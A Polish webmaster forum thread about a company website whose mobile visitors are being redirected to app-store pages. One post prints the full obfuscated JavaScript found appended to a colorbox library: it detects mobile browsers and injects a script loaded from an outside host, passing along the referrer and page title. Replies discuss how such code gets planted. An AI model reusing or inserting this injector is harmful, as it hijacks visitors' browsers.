Złośliwe przekierowanie na iphone

Witam szanownych kolegów po branży...
Dość nietypowy problem mnie spotkał w robocie... jestem odpowiedzialny zakładową stronę internetową
[EDIT: strona już została naprawiona, ale dalej szukamy przyczyny]

Dziś dostaliśmy zgłoszenie, że osoby, które próbują wejść na strone z iPhonów nie są w stanie. Zamiast strony docelowej dostają przekierowanie do sklepu istore... do różnych aplikacji... wygląda to jak jakiś wirus....
ponoć podobne jednorazowe zdarzenie wystąpiło również u użytkowników telefonu z Androidem...

Na serwerze jest więcej kopii tego skryptu, dostępne pod innymi adresami i w innych katalogach - one bez problemu działają...
Sprawdzałem skrypt i nie widzę w nim zmian dokonywanych w ostatnim czasie...
nie mam pomysłu gdzie szukać przyczyn....

Na serwerze jest zainstalowany LAMP

Pozdrawiam
Daniel

Przejrzałem skrypty klienckie i nie znalazłem nic podejrzanego. Być może kod serwerowy jest zainfekowany i wstrzykuje kod w zależności od różnych warunków (pasujący User-Agent, sugerujący określoną podatność) albo po prostu częściowo losowo? iPhone nie mam, to nie przetestuję. Android zachowuje się ok.

Off-topic #1: Ale januszowy javascript :D Aż boli patrzenie na to.

Off-topic #2: Jeden z dołączonych plików js ma nagłówek: // NOTICE!! DO NOT USE ANY OF THIS JAVASCRIPT // IT'S JUST JUNK FOR OUR DOCS!

Na przyszłość dla potomnych...
do ładowanej zewnętrznie biblioteki colorbox został dodany kod JS który robił to przekierowanie...
zakodowany tak by nie można było go łatwo zauważyć...
oto on:

var _0xf1a7=["\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x3C\x73\x63\x72\x69\x70\x74\x20\x74\x79\x70\x65\x3D\x22\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x74\x69\x7A\x65\x72\x6D\x65\x64\x69\x61\x73\x2E\x63\x6F\x6D\x2F\x6F\x64\x65\x73\x73\x61\x2F\x6D\x64\x32\x3F\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D","\x72\x65\x66\x65\x72\x72\x65\x72","\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D","\x74\x69\x74\x6C\x65","\x22\x3E\x3C","\x2F\x73\x63\x72\x69\x70\x74\x3E","\x77\x72\x69\x74\x65"];function isMobile(){var _0x405dx2=(navigator[_0xf1a7[0]]||navigator[_0xf1a7[1]]||window[_0xf1a7[2]]);if(/android.+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|symbian|treo|up\.(browser|link)|vodafone|wap|windows (ce|phone)|xda|xiino/i[_0xf1a7[3]](_0x405dx2)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(di|rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0xf1a7[3]](_0x405dx2[_0xf1a7[4]](0,4))){return true};return false}if(isMobile()===true){document[_0xf1a7[11]](_0xf1a7[5]+encodeURIComponent(document[_0xf1a7[6]])+_0xf1a7[7]+encodeURIComponent(document[_0xf1a7[8]])+_0xf1a7[9]+_0xf1a7[10])}

Pozdrawiam :)

@miedzik:

właśnie taki kod najłatwiej zauważyć :) nie wygląda jak typowy kod z kompresora.
ale co masz na mysli mówiąc "zewnętrznie ładowanej"? czytałem skrypt colorboxa z Twojej strony (ładowany lokalnie, tj skrypt był na Twoim serwerze, a nie CDN, bo nie sprawdzałem kodów z CDN) i tego tam nie było

i jeszcze jedno - doklejanie kodu sugeruje
a) dziurę w stronie
b) wyciek haseł dostępowych (np trojan podebrał z komputera hasło do FTP)

UWAGA oba zdarzają się tak samo często i powodują, że złośliwy kod po usunięciu sam wróci na miejsce